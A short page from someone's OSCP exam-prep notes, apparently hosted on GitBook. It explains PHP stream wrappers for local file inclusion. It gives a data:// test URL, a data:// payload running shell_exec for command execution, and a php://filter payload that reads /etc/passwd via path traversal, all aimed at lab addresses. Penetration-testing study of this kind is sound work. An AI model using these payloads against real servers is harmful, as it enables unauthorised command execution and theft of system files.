OSCP Notes
  • Introduction
  • Port Scanning
  • Nmap Port Scanning
  • Nmap Scripts
  • Services Enumeration
    • SMB Enumeration (Port 139, 445)
    • SNMP Enumeraion (Port 161)
    • NFS Enumeration (Port 111, 2049)
    • SMTP Enumeration (Port 25)
    • DNS Enumeration (Port 53)
    • POP3 (Port 110, 25*)
    • MySQL (Port 3306)
    • Oracle (Port 1521)
    • MsSQL (Port 1433)
  • Web / HTTP
    • Web Scanning
    • CMS
    • Directory Fuzzing
    • File Upload
      • Bypass file upload filtering
      • Bruteforcing extensions
      • WebDAV
    • Bruteforce Authentication
    • LFI and RFI
      • Interesting Files for LFI
      • Null Byte Injection
      • PHP Wrappers
    • ShellShock
    • Post Requests
  • password attacks
    • Brute-force service password
    • Cracking Password
    • Custom Worldlist
  • Exploitaion
    • Searchsploit
    • Compiling the Exploit
  • shell
    • Bind and Reverse shell
    • Upgrading shell
    • msfvenom
  • Linux Post Exploitation
    • Linux Manual Exploitation
    • Linux post exploitation scripts
    • Kernel Exploitation
  • windows post exploitation
    • General
    • Manual Exploitaion
    • Dumping the sam file
    • SUDO SU
    • Automated enumeration script
    • Windows Exploit Suggester
  • file transfer
    • General
    • Linux
    • Windows
  • cheatsheets
    • Command injection Cheatsheet
    • Find Command Cheatsheet
    • Netcat
    • SQL Injection Bypass
    • CheckList
    • XSS Payload
Powered by GitBook
On this page
  • Identifying Vulnerability
  • Executing commands
  • php filter
  1. Web / HTTP
  2. LFI and RFI

PHP Wrappers

PHP provides several protocol wrappers that we can use to exploit directory traversal and local file inclusion. These filters give us additional flexibility when attempting to inject PHP code via LFI vulnerabilities.

Identifying Vulnerability

http://192.168.112.132/menu.php?file=data:text/plain,helloworld

IF this payload return helloworld then we can use php wrappers to execute php commands too

Executing commands 

http://192.168.112.132/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

php filter

Another PHP wrapper, php://filter in this example the output is encoded using base64, so you’ll need to decode the output.

http://192.168.155.131/fileincl/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd
PreviousNull Byte InjectionNextShellShock

Last updated 3 years ago